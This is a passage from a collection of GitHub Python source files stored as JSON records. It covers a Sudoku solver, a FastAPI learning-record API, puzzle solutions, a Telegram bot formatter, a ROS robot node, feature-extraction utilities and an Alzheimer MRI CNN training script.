target_tile.set_value(value)\n choice = True\n return choice\n\n def min_choice_tile(self) -> Tile:\n \"\"\"Returns a tile with value UNKNOWN and\n minimum number of candidates.\n Precondition: There is at least one tile\n with value UNKNOWN.\n \"\"\"\n min_candidates = 0\n for row in self.tiles:\n for tile in row:\n if tile.value not in CHOICES:\n if min_candidates == 0:\n min_candidates = len(tile.candidates)\n target_tile = tile\n elif len(tile.candidates) < min_candidates:\n min_candidates = len(tile.candidates)\n target_tile = tile\n return target_tile\n\n def as_list(self) -> List[str]:\n \"\"\"Tile values in a format compatible with\n set_tiles.\n \"\"\"\n row_syms = [ ]\n for row in self.tiles:\n values = [tile.value for tile in row]\n row_syms.append(\"\".join(values))\n return row_syms\n\n def is_complete(self) -> bool:\n \"\"\"None of the tiles are UNKNOWN.\n Note: Does not check consistency; do that\n separately with is_consistent.\n \"\"\"\n for row in self.tiles:\n for tile in row:\n if tile.value not in CHOICES:\n return False\n return True\n\n def solve(self):\n \"\"\"General solver; guess-and-check\n combined with constraint propagation.\n solve() -> bool:\n propagate constraints.\n if board is solved, return True\n if board is inconsistent, return False\n otherwise:\n save the state of the board\n select a tile to guess values for\n for each value the tile could hold:\n set the tile to that value\n if solve():\n return True\n else:\n restore the board to saved state\n # Tried all the possibilities; none worked\n return False\n \"\"\"\n self.propagate()\n if self.is_complete():\n return True\n if self.is_consistent() == False:\n return False\n board_state = self.as_list()\n selected_tile = self.min_choice_tile()\n for value in selected_tile.candidates:\n selected_tile.set_value(value)\n if self.solve():\n return True\n else:\n self.set_tiles(board_state)\n return False\n\n def propagate(self):\n \"\"\"Repeat solution tactics until we\n don't make any progress, whether or not\n the board is solved.\n \"\"\"\n progress = True\n while progress:\n progress = self.naked_single()\n self.hidden_single()\n return","repo_name":"BriannaV/SudokuSolver","sub_path":"sdk_board.py","file_name":"sdk_board.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39435357843","text":"\"\"\"Main module for Ralph's LRS API.\"\"\"\nfrom functools import lru_cache\nfrom urllib.parse import urlparse\n\nimport sentry_sdk\nfrom fastapi import Depends, FastAPI\n\nfrom ralph.conf import settings\n\nfrom .. import __version__\nfrom .auth import get_authenticated_user\nfrom .auth.user import AuthenticatedUser\nfrom .routers import health, statements\n\n\n@lru_cache(maxsize=None)\ndef get_health_check_routes():\n \"\"\"Return the health check routes.\"\"\"\n return [route.path for route in health.router.routes]\n\n\ndef filter_transactions(event, hint): # pylint: disable=unused-argument\n \"\"\"Filter transactions for Sentry.\"\"\"\n url = urlparse(event[\"request\"][\"url\"])\n\n if settings.SENTRY_IGNORE_HEALTH_CHECKS and url.path in get_health_check_routes():\n return None\n\n return event\n\n\nif settings.SENTRY_DSN is not None:\n sentry_sdk.init(\n dsn=settings.SENTRY_DSN,\n traces_sample_rate=settings.SENTRY_LRS_TRACES_SAMPLE_RATE,\n release=__version__,\n environment=settings.EXECUTION_ENVIRONMENT,\n max_breadcrumbs=50,\n before_send_transaction=filter_transactions,\n )\n\napp = FastAPI()\napp.include_router(statements.router)\napp.include_router(health.router)\n\n\n@app.get(\"/whoami\")\nasync def whoami(\n user: AuthenticatedUser = Depends(get_authenticated_user),\n):\n \"\"\"Return the current user's username along with their scopes.\"\"\"\n return {\"agent\": user.agent, \"scopes\": user.scopes}\n","repo_name":"openfun/ralph","sub_path":"src/ralph/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"26613340973","text":"import heapq\n\n\nclass Multiset:\n def __init__(self):\n self.addset = []\n self.delset = []\n\n def add(self, value):\n heapq.heappush(self.addset, value)\n\n def discard(self, value):\n heapq.heappush(self.delset, value)\n\n def smallest(self):\n while self.delset and self.addset[0] == self.delset[0]:\n heapq.heappop(self.addset)\n heapq.heappop(self.delset)\n return self.addset[0]\n\n def is_empty(self):\n return len(self.addset) - len(self.delset) <= 0\n\n\nQ = int(input())\n\nA = Multiset()\nB = Multiset()\ndct = {}\nfor _ in range(Q):\n l = list(input().split())\n\n if l[0] == \"1\":\n x = int(l[1])\n A.add(x)\n B.add(-x)\n dct[x] = dct.setdefault(x, 0) + 1\n\n elif l[0] == \"2\":\n x, c = map(int, l[1:])\n try:\n cnt = dct[x]\n d = min(c, dct[x])\n dct[x] -= d\n\n for _ in range(d):\n A.discard(x)\n B.discard(-x)\n except:\n continue\n\n else:\n # print(A.addset, B.addset, A.delset, B.delset)\n print(abs(B.smallest()) - A.smallest())\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-253/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41365906285","text":"panjang = int(input('Masukkan panjang deret: '))\n\nfibonanci = [0,1]\n\nfor i in range(2, panjang):\n angka1 = fibonanci[i - 2]\n angka2 = fibonanci[i - 1]\n angka_selanjutnya = angka1 + angka2\n fibonanci.append(angka_selanjutnya)\nprint(fibonanci)","repo_name":"teolloDEV/basic-python","sub_path":"kasus/fibonanci/menggunakan_list.py","file_name":"menggunakan_list.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"ms","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42440577420","text":"print(''''---------------------------\nhallo welkom bij de cluedo try outs.\nWe gaan je vandaag een paar vragen stellen waar je j of n kan beantwoorden.\ndit kan je vertellen welke rol precies bij je past.\n''')\nlijst ='ja','j','yes','y'\nlijstnee ='nee','n','nooit','no','nein'\nlocatie = input('kan je zelf naar de locatie in rotterdam komen?j/n\\n').lower()\nopleiding = input('heb je een mbo niveau 4 opleiding gedaan in acteren.?j/n\\n').lower()\nif opleiding and locatie in lijst:\n gender = input('ben u een man of vrouw?\\n')\n if gender =='man':\n while gender:\n #hierzo ben ik bezig met die kolonel ofso\n militair = input('heb je een militaire achter grond?\\n')\n if militair in lijst:\n gestolen = input(\"heb je ooit iets gestolen? \\n\")\n if gestolen in lijst:\n verdacht = input('heb je ooit iets verdachts gedaan? \\n' )\n if verdacht in lijst:\n print('Je mag op auditie voor de rol van Kolonel van Geelen')\n break\n dominee = input(\"weet je hoe een dominee speelt?\\n\")\n if dominee in lijst:\n rol = input('weet jij hoe je je rol moet spelen\\n')\n if rol in lijst:\n leeftijd3 = input('ben jij ouder dan 40')\n if leeftijd3 in lijst:\n print(\"Je mag op auditie voor de rol van Dominee Groenewoud\")\n break\n pimpel = input('kan jij praten als een professor?\\n')\n if pimpel in lijst:\n doen = input(\"heb je enig idee wat proffesors doen?\\n \")\n if doen in lijst:\n dinosaurussen = input('weet je van dinosaurussen?\\n')\n if dinosaurussen in lijst:\n print('Je mag op auditie voor de rol van Professor Pimpel')\n break\n if gender =='vrouw':\n while gender:\n pruik =input('wil jij een pruik dragen mocht dat nodig zijn? \\n')\n if pruik in lijst:\n getrouwd = input('ben je getrouwd met iemand \\n')\n if getrouwd in lijst:\n leeftijd = input('ben jij ouder dan 40?\\n ')\n if leeftijd in lijst:\n print('Je mag op auditie voor de rol van Mevrouw de Wit\\n')\n break\n #dit is die van rosa\n jaloer = input('ben je snel jaloers?\\n ')\n if jaloer in lijst:\n makeup = input('ben je bereid om make up op te doen?\\n ')\n if makeup in lijst:\n vermoeid = input('ben je snel vermoeid? \\n')\n if vermoeid in lijst:\n print('Je mag op auditie voor de rol van Rosa Roodhart')\n break\n #die van draet\n stoer = input('ben je een echte stoere vrouw?\\n')\n if stoer in lijst:\n feest = input('hou jij van feest?\\n ')\n if feest in lijst:\n chantage = input('herken jij jezelf bij chantage? \\n')\n if chantage in lijst:\n print('Je mag op auditie voor de rol van Mevrouw Blaauw van Draet')\n break\n\n \n \n\n\n","repo_name":"Suspious/toets","sub_path":"cluedo.py","file_name":"cluedo.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35373912459","text":"import itertools\nimport re\n\nfrom telegram import InlineKeyboardButton\n\nfrom request_matcher import SET_EXPR\n\nASCII_LOWER = \"abcdefghijklmnopqrstuvwxyz0123456789\"\nOFFSET = ord(\"🇦\") - ord(\"A\")\n\n\ndef formatInfoResponse(message: dict) -> str:\n return u\"\\U0001F170\\uFE0F Name: \" + unescape_html(message[\"name\"]) + \"\\n\" \\\n \"\\U0001F5BC Image: \" + message[\n \"image_url\"] + \"\\n\" \\\n \"\\U0001F4C6 Year released: \" + str(message[\"year_released\"]) + \"\\n\" \\\n \"\\u2693\\uFE0F Weight: \" + str(\n message[\"weight\"]) + \"g\\n\" \\\n \"\\U0001F4D0 Dimensions: \" + str(message[\"dim_x\"]) + \"x\" + str(\n message[\"dim_y\"]) + \"x\" + str(message[\"dim_z\"])\n\n\ndef formatPriceResponse(message: dict) -> str:\n return u\"Price for \" + message[\"item\"][\"no\"] + \" (\" + message[\"new_or_used\"] + \")\" + \"\\n\" \\\n \"\\U0001F4C9 Minimal price: \" + message[\"min_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F4C6 Maximal price: \" + message[\"max_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F4CA Average price: \" + message[\"avg_price\"] + unescape_html(message[\"currency_code\"]) + \"\\n\" \\\n \"\\U0001F522 Quantity for sale: \" + str(message[\"total_quantity\"])\n\n\ndef formatItemsSoldResponse(message: dict) -> str:\n if len(message[\"price_detail\"]) > 0:\n res = u\"Recently sold \" + message[\"item\"][\"no\"] + \" (\" + message[\"new_or_used\"] + \"):\"\n for item in itertools.islice(message[\"price_detail\"], 20):\n res += \"\\nSeller: \" + resolve_flag_emoji(item[\"seller_country_code\"]) + \\\n \", Buyer: \" + resolve_flag_emoji(item[\"buyer_country_code\"]) + \\\n \", Price: \" + item[\"unit_price\"] + \" \" + unescape_html(message[\"currency_code\"]) + \\\n \", Quantity: \" + str(item[\"quantity\"])\n else:\n res = \"Seems like no \" + message[\"item\"][\"no\"] + \" were sold recently \\U0001F914\"\n return res\n\n\ndef formatItemsForSaleResponse(message: dict) -> str:\n if len(message[\"price_detail\"]) > 0:\n res = message[\"item\"][\"no\"] + \" for sale (\" + message[\"new_or_used\"] + \"):\"\n for item in itertools.islice(message[\"price_detail\"], 20):\n res += u\"\\n\\U0001F4B5 Price: \" + item[\"unit_price\"] + unescape_html(message[\"currency_code\"]) +\\\n \", \\U0001F522 Quantity: \" + str(item[\"quantity\"]) + \\\n \", \\U0001F69A Ships to \" + resolve_flag_emoji(\"ua\") + \": \" + \\\n (u\"\\u2705\" if item[\"shipping_available\"] else u\"\\u274C\")\n else:\n res = \"Seems like \" + message[\"item\"][\"no\"] + \" is out of stock \\U0001F914\"\n return res\n\n\ndef unescape_html(s: str):\n s = s.replace(\"(\", \"(\")\n s = s.replace(\")\", \")\")\n s = s.replace(\"<\", \"<\")\n s = s.replace(\">\", \">\")\n s = s.replace(\"'\", \"'\")\n # this has to be last:\n s = s.replace(\"&\", \"&\")\n return s\n\n\ndef resolve_flag_emoji(countrycode: str) -> str:\n if countrycode == \"UK\":\n return u\"\\U0001F1EC\\U0001F1E7\"\n elif countrycode == \"RU\":\n return u\"\\U0001F4A9\"\n code = [c for c in countrycode.lower() if c in ASCII_LOWER]\n return \"\".join([chr(ord(c.upper()) + OFFSET) for c in code])\n\n\ndef search_response_formatter(message: dict, target: str):\n keyboard = []\n sets = list(filter(lambda x: re.search(SET_EXPR, x[\"set_num\"]), message[\"results\"]))\n if len(sets) > 0:\n sets = sorted(sets, key=lambda k: k['year'], reverse=True)\n for item in itertools.islice(sets, 20):\n keyboard.append([\n InlineKeyboardButton(\n item[\"set_num\"] + \" - \" + unescape_html(item[\"name\"]) + \" (\" + str(item[\"year\"]) + \")\",\n callback_data=target + \" \" + item[\"set_num\"])])\n return keyboard\n","repo_name":"vdubchak/BricklinkerPy","sub_path":"bricklink_telegram_bot/response_formatters.py","file_name":"response_formatters.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17896638067","text":"n = int(input())\nnums = list(map(int, input().split()))\nsum = 1\nflag = 1\nupper = pow(10, 18)\nfor num in nums:\n if flag == 1:\n sum = sum * num\n if sum > upper:\n flag = 2\n if num == 0:\n flag = 0\n break\nif flag == 2:\n print(-1)\nelse:\n print(sum * flag)\n","repo_name":"tssstkk/atcoder","sub_path":"ABC/169/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28296974370","text":"\nfrom typing import Union\n\n\nclass Account(object):\n\n ID_COUNT = 1\n\n def __init__(self, name, **kwargs):\n self.id = self.ID_COUNT\n self.name = name\n self.__dict__.update(kwargs)\n if not hasattr(self, 'value'):\n self.value = 0\n Account.ID_COUNT += 1\n \n def transfer(self, amount):\n self.value += amount\n\n\n\nclass Bank:\n \"\"\"The bank\"\"\"\n def __init__(self):\n self.account = []\n\n def add(self, account):\n if type(account) is not Account:\n raise TypeError(\"account must be an instance of Account\")\n if self.is_corrupted(account):\n raise Exception(\"account is corrupted\")\n\n self.account.append(account)\n\n def transfer(self, origin, dest, amount):\n \"\"\"\n @origin: int(id) or str(name) of the first account\n @dest: int(id) or str(name) of the destination account\n @amount: float(amount) amount to transfer\n @return True if success, False if an error occured\n \"\"\"\n\n try:\n origin_acc = self._get_account(origin)\n dest_acc = self._get_account(dest)\n except Exception:\n return False\n\n if self.is_corrupted(origin_acc) or self.is_corrupted(dest_acc):\n return False\n\n if origin_acc.value < amount:\n return False\n\n origin_acc.transfer(-amount)\n dest_acc.transfer(amount)\n\n return True\n\n def fix_account(self, account):\n \"\"\"\n fix the corrupted account\n @account: int(id) or str(name) of the account\n @return True if success, False if an error occured\n \"\"\"\n try:\n acc = self._get_account(account)\n except Exception:\n return False\n\n acc.value = 0\n\n def is_corrupted(self, account: Account) -> bool:\n attributes = dir(account)\n\n return len(attributes) % 2 == 0 \\\n and any(a for a in attributes if a.startswith(\"b\"))\\\n and not any(a for a in attributes if a.startswith(\"zip\") or a.startswith(\"addr\"))\\\n and \"name\" not in attributes\\\n and \"id\" not in attributes\\\n and \"value\" not in attributes\n\n def _get_account(self, account: Union[str, int]):\n if type(account) is int:\n return self.account[account]\n elif type(account) is str:\n return next(acc for acc in self.account if acc.name == account)\n else:\n raise TypeError()","repo_name":"Yanis-F/42ai-bootcamp-python","sub_path":"module01/ex06/the_bank.py","file_name":"the_bank.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6473138879","text":"#! /usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan \nfrom geometry_msgs.msg import Twist\n\nturn_velocity = 0.9\nlinear_velocity = 1.\nfirst_turn_distance = 1\nsecond_turn_distance = 0.4\n\ndef callback(msg): \n #print msg.ranges[360] #We print the distance to an obstacle in front of the robot\n\n#If the distance to an obstacle in front of the robot is bigger than 1 meter, the robot will move forward\n if msg.ranges[360] > first_turn_distance:\n move.linear.x = linear_velocity\n move.angular.z = 0.0\n\n#If the distance to an obstacle in front of the robot is smaller than 1 meter, the robot will turn left\n if msg.ranges[360] < 1: \n move.linear.x = linear_velocity/10.\n move.angular.z = turn_velocity\n \n#If the distance to an obstacle at the left side of the robot is smaller than 0.3 meters, the robot will turn right\n if msg.ranges[719] < second_turn_distance:\n move.linear.x = linear_velocity/10.\n move.angular.z = -turn_velocity\n \n#If the distance to an obstacle at the right side of the robot is smaller than 0.3 meters, the robot will turn left\n if msg.ranges[0] < second_turn_distance:\n move.linear.x = linear_velocity/10.\n move.angular.z = turn_velocity\n \n pub.publish(move)\n\nrospy.init_node('sub_node')\nsub = rospy.Subscriber('/kobuki/laser/scan', LaserScan, callback) #We subscribe to the laser's topic\npub = rospy.Publisher('/cmd_vel', Twist)\nmove = Twist()\n\nrospy.spin()","repo_name":"darienmt/ros_ignite_academy_ros_in_5_days","sub_path":"src/topics_mini_project/src/mini_project.py","file_name":"mini_project.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"34102607626","text":"from functools import partial\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nimport tqdm\n\nPERCENTILES = (10, 33, 66, 90, 95)\nHIGH_LEVEL_STATS = (np.min, np.max, np.sum, np.std, np.mean, np.median)\nOUTLIERS_THRESHOLDS = (500, 5000, 10000, 30000, 50000, 100000, 1000000)\n\nIMPORTANT_GROUPS = (0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13, 14, 15, 16, 18, 147, 20, 21, 23, 24, 25, 26, 151, 28, 29,\n 31, 32, 34, 35, 36, 37, 39, 43, 44, 46, 50, 55, 57, 59, 61, 64, 69, 80, 81, 82, 105, 109, 110, 112, 123)\n\n\nSEQ_LENGTH = 730\nNULL_GROUP_ID = 204\n\n\ndef convert_dates(dates, output=None):\n if output == 'day_of_week':\n return dates % 7\n if output == 'month':\n return (dates // 30) % 12\n if output == 'quarter':\n return (dates // 90) % 4\n return dates\n\n\ndef get_important_groups(train_data, top_k=30):\n important_groups = set()\n for fa in (np.size, np.max, np.sum):\n group_index = (\n train_x\n .groupby('small_group').amount_rur.agg(fa)\n .sort_values(ascending=False)\n .iloc[:top_k].index.tolist()\n )\n important_groups.update(group_index)\n return list(important_groups)\n\n\nclass GlobalClientFeaturesExtractor:\n \n AGG_LEVELS = (('month', 30, 25), ('quarter', 90, 9))\n \n def __init__(self, cfg=None):\n self._cfg = cfg\n \n def extract(self, transactions):\n n = transactions.shape[0]\n features = []\n \n ############################################\n # Dates ####################################\n ############################################\n #print('Dates features extraction...')\n t_dates = transactions.trans_date\n \n unique_dates = t_dates.nunique()\n period_length = t_dates.max() - t_dates.min() + 1\n \n # fraction of transactions for a week day\n dow_dates = convert_dates(t_dates, 'day_of_week')\n week_day_fracs = np.array([(dow_dates == day_of_week).sum() / n for day_of_week in range(7)])\n # fraction of transactions for a month\n m_dates = convert_dates(t_dates, 'month')\n month_fracs = np.array([(m_dates == month).sum() / n for month in range(12)])\n # fraction of transactions for a quarter\n q_dates = convert_dates(t_dates, 'quarter')\n quarter_fracs = np.array([(q_dates == quarter).sum() / n for quarter in range(4)])\n transactions_per_day_info = transactions.groupby('trans_date').trans_date.count().describe()\n \n features.extend([\n period_length,\n unique_dates / period_length, # prob of [>=1] transactions for a given day\n *list(week_day_fracs), week_day_fracs.mean(), week_day_fracs.std(), week_day_fracs.min(), week_day_fracs.max(),\n *list(month_fracs), month_fracs.mean(), month_fracs.std(), month_fracs.min(), month_fracs.max(),\n *list(quarter_fracs), quarter_fracs.mean(), quarter_fracs.std(), quarter_fracs.min(), quarter_fracs.max(),\n *list(transactions_per_day_info)\n ])\n \n ############################################\n # Money ####################################\n ############################################\n #print('Money features extraction...')\n money = transactions.amount_rur\n \n week_day_money_stats = np.array([list(money[dow_dates == day_of_week].describe()) for day_of_week in range(7)]).ravel()\n month_money_stats = np.array([list(money[m_dates == month].describe()) for month in range(12)]).ravel()\n quarter_money_stats = np.array([list(money[q_dates == quarter].describe()) for quarter in range(4)]).ravel()\n \n agg_features = []\n for name, duration, n_buckets in self.AGG_LEVELS:\n #print(f'Money features, agg level: {name}')\n buckets = transactions.assign(bucket_id = transactions.trans_date // duration)\n buckets_values = defaultdict(list)\n for bucket_id in range(n_buckets):\n bucket_df = buckets.query(f'bucket_id == {bucket_id}')\n bucket_money = bucket_df.amount_rur.values\n for fa in HIGH_LEVEL_STATS:\n #print(fa.__name__)\n value = fa(bucket_money) if not bucket_df.empty else 0\n agg_features.append(value)\n buckets_values[fa.__name__].append(value)\n for fa in HIGH_LEVEL_STATS:\n values = np.array(buckets_values[fa.__name__])\n for fb in HIGH_LEVEL_STATS:\n agg_features.append(fb(value))\n \n # Outliers\n outliers_features = []\n for threshold in OUTLIERS_THRESHOLDS:\n #print(f'Outliers threshold: {threshold}')\n outliers = transactions.assign(is_outlier = transactions.amount_rur > threshold)\n for fa in (np.min, np.max, np.sum):\n outliers_features.append(fa(outliers.is_outlier))\n outliers_features.append(fa(outliers.query('is_outlier == True').amount_rur))\n \n features.extend([\n *list(money.describe()), *list(week_day_money_stats), *list(month_money_stats), *list(quarter_money_stats),\n *agg_features,\n *outliers_features,\n ])\n \n ############################################\n # Groups ###################################\n ############################################\n \n # Just one-hot count, amount sum, amount max\n groups_skeleton = pd.DataFrame({'small_group': IMPORTANT_GROUPS})\n \n group_features = []\n for fa in (np.size, np.sum, np.max):\n g_features = (\n pd.merge(groups_skeleton,\n transactions.groupby('small_group').amount_rur.agg(fa),\n on='small_group', how='left')\n .amount_rur.tolist()\n )\n group_features.extend(g_features)\n \n features.extend([\n *group_features,\n ])\n \n return np.nan_to_num(features)\n \n def extract_from_dataset(self, transactions_df, targets_df, path):\n features = np.array([\n self.extract(transactions_df.query(f'client_id == {client_id}'))\n for client_id in tqdm.tqdm_notebook(targets_df.client_id.values)\n ])\n\n with open(path, 'wb') as f:\n np.save(f, features)\n\n\ndef fill_small_group_na(df):\n na_index = df['small_group'].isna()\n df.loc[na_index, 'small_group'] = NULL_GROUP_ID\n df['small_group'] = df['small_group'].astype('int')\n return df\n\n\nclass TimeSeriesFeatureExtractor():\n def __init__(self, cfg=None):\n self._cfg = cfg\n \n @staticmethod\n def get_ts_skeleton():\n return pd.DataFrame({'trans_date': list(range(SEQ_LENGTH))})\n \n def drop_duplicates_amount_rur(self, transactions_df):\n return (\n transactions_df\n .sort_values(['trans_date', 'amount_rur'], ascending=False)\n .drop_duplicates(['trans_date'], keep='first')\n )\n \n def extract(self, transactions_df):\n skeleton = self.get_ts_skeleton()\n clean_transactions = self.drop_duplicates_amount_rur(transactions_df)\n result = (\n skeleton\n .merge(clean_transactions, how='left', on='trans_date')\n .drop('client_id', axis=1)\n )\n result = fill_small_group_na(result)\n result = result.fillna(0)\n \n return {\n 'small_group_seq': result.small_group.values,\n 'money_seq': result.amount_rur.values\n }\n \n def extract_from_dataset(self, transactions_df, targets_df, paths_dict): \n features = [\n self.extract(transactions_df.query(f'client_id == {client_id}'))\n for client_id in tqdm.tqdm_notebook(targets_df.client_id.values)\n ]\n result = defaultdict(list)\n for features_dict in features:\n for k, v in features_dict.items():\n result[k].append(v)\n \n for k, path in paths_dict.items():\n with open(path, 'wb') as f:\n np.save(f, np.array(result[k]))","repo_name":"dzemidkada/onti-competition","sub_path":"src/feature_extraction_utils.py","file_name":"feature_extraction_utils.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12833181126","text":"import os\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport boto3\nimport mlflow\nimport numpy as np\nimport pandas as pd\nimport splitfolders\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nfrom botocore.client import Config\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.layers import Conv2D, Dropout, MaxPool2D\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# Create a connection to S3 using the Boto3 library\ns3 = boto3.resource('s3',\n endpoint_url=os.getenv('MLFLOW_S3_ENDPOINT_URL'),\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY'),\n config=Config(signature_version='s3v4'),\n region_name='us-east-1')\n\n# Upload a file to S3 bucket\ns3.Bucket('ipynb-py').upload_file(Path(__file__).name, str(datetime.now()) + Path(__file__).name)\n\n# Set your variables for your environment\nEXPERIMENT_NAME = \"deep-learning-cnn-custom\"\n\n# Set tracking URI to your Heroku application\nmlflow.set_tracking_uri(\"https://mlflow.brainsight.tech\")\n\n# Set experiment's info \nmlflow.set_experiment(EXPERIMENT_NAME)\n\n# Get our experiment info\nexperiment = mlflow.get_experiment_by_name(EXPERIMENT_NAME)\n\n# Call mlflow autolog\nmlflow.tensorflow.autolog()\n\n# Start the experiment run\nwith mlflow.start_run(experiment_id=experiment.experiment_id):\n\n # Download the dataset from S3\n data_root_orig = tf.keras.utils.get_file(\n origin='https://brain-disease-detector.s3.eu-west-3.amazonaws.com/alzheimer_no_split_folders_renamed.zip',\n fname='/content',\n cache_subdir=\"/content\",\n archive_format='zip',\n extract=True)\n \n # Get the class names from the directory\n class_names = os.listdir(\n '/content/alzheimer_no_split_folders_renamed')\n\n # Split the dataset into training, validation, and testing sets using the splitfolders library\n splitfolders.ratio('/content/alzheimer_no_split_folders_renamed',\n output='/content/output_alzheimer_no_split_folders_renamed_v1',\n ratio=(0.64, 0.16, 0.20))\n image_dir_path = '.'\n\n # Create a DataFrame with the paths to the image files\n paths = [path.parts[-3:] for path in\n Path(\n '/content/output_alzheimer_no_split_folders_renamed_v1').rglob(\n '*.jpg')]\n df = pd.DataFrame(data=paths, columns=['folder', 'class', 'file_name'])\n print(df.head(10))\n print(df.tail(10))\n\n # Get the number of images in each folder/class of the training, validation, and testing sets\n df.groupby(['folder', 'class']).size()\n df[df[\"folder\"] == \"train\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"train\"])\n df[df[\"folder\"] == \"val\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"val\"])\n df[df[\"folder\"] == \"test\"].groupby([\"class\"]).size() / len(df[df[\"folder\"] == \"test\"])\n\n # Define the ImageDataGenerator objects for the training, validation, and testing sets\n\n train_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n val_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n test_image_generator = ImageDataGenerator(rescale=1 / 255)\n\n # Create the training, validation, and testing datasets\n train_dataset = train_image_generator.flow_from_directory(batch_size=8,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/train',\n shuffle=True,\n target_size=(176, 208),\n class_mode='categorical')\n\n validation_dataset = val_image_generator.flow_from_directory(batch_size=8,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/val',\n shuffle=True,\n target_size=(176, 208),\n class_mode='categorical')\n\n test_dataset = test_image_generator.flow_from_directory(batch_size=1300,\n directory='/mnt/c/Users/Laure/Documents/Dev/ProjetOpenBrain/content/output_alzheimer_no_split_folders_renamed_v1/test',\n shuffle=True,\n target_size=(176, 208))\n \n # Get the images and labels from the training, validation, and testing datasets\n train_images, train_labels = train_dataset.next()\n validation_images, validation_labels = validation_dataset.next()\n test_images, test_labels = test_dataset.next()\n\n # Get the class indices from the training, validation, and testing datasets\n train_dataset.class_indices\n test_dataset.class_indices\n\n # Create the model\n model = tf.keras.Sequential([\n\n Conv2D(filters=16, kernel_size=(3, 3), strides=1, padding=\"same\",\n activation=\"relu\", input_shape=(176, 208, 3)), # the input shape (height, width, channels)\n MaxPool2D(pool_size=2, # the size of the pooling window\n strides=2), # the movement of the pooling on the input\n Dropout(0.1),\n Conv2D(filters=32, kernel_size=(3, 3), strides=1, padding=\"same\",\n activation=\"relu\"), \n MaxPool2D(2, 2),\n Dropout(0.1),\n Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding=\"same\",\n activation=\"relu\"),\n MaxPool2D(2, 2),\n Dropout(0.1),\n tf.keras.layers.Flatten(), # this layer turns multi-dimensional images into flat objects\n tf.keras.layers.Dense(128, activation=\"relu\"), # the number of neurons in the layer\n Dropout(0.1),\n tf.keras.layers.Dense(64, activation=\"relu\"),\n tf.keras.layers.Dense(4, activation=\"softmax\")\n ]\n )\n\n model.summary()\n\n # Defining metrics and optimization\n\n METRICS = [\n tf.keras.metrics.CategoricalAccuracy(name='acc'),\n tf.keras.metrics.AUC(name='auc'),\n tfa.metrics.F1Score(num_classes=4, average='macro', name='f1_score')\n ]\n\n callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=3,\n restore_best_weights=False)\n initial_learning_rate = 0.0005\n \n # Define the learning rate schedule\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate,\n decay_steps=1000,\n decay_rate=0.96,\n staircase=True)\n \n # Compile the model\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n loss=tf.keras.losses.CategoricalCrossentropy(),\n metrics=METRICS)\n\n EPOCHS = 50\n\n # Train the model\n history = model.fit(train_dataset, validation_data=validation_dataset, shuffle=True, epochs=EPOCHS)\n \n train_dataset.class_indices.values()\n type(train_dataset.class_indices.values())\n\n # Evaluation on validation dataset\n _ = model.evaluate(validation_dataset)\n\n # Evaluation on test dataset\n _ = model.evaluate(test_dataset)\n test_images, test_labels = test_dataset.next()\n test_dataset.class_indices.keys()\n\n predicted_labels = model.predict(test_dataset)\n predicted_labels = np.argmax(predicted_labels, axis=1)\n test_labels = np.argmax(test_labels, axis=1)\n target_names = [k + ' : ' + str(v) for k, v in test_dataset.class_indices.items()]\n print(classification_report(test_labels, predicted_labels, target_names=target_names))\n","repo_name":"YuliyaSheichenka/Certification_Bloc_6","sub_path":"AlzheimerCNN_BrainSight.py","file_name":"AlzheimerCNN_BrainSight.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43406865708","text":"import os\nimport pickle\nimport sys\nsys.path.append(os.pardir)\n\nimport numpy as np\n\nfrom dataset.mnist import 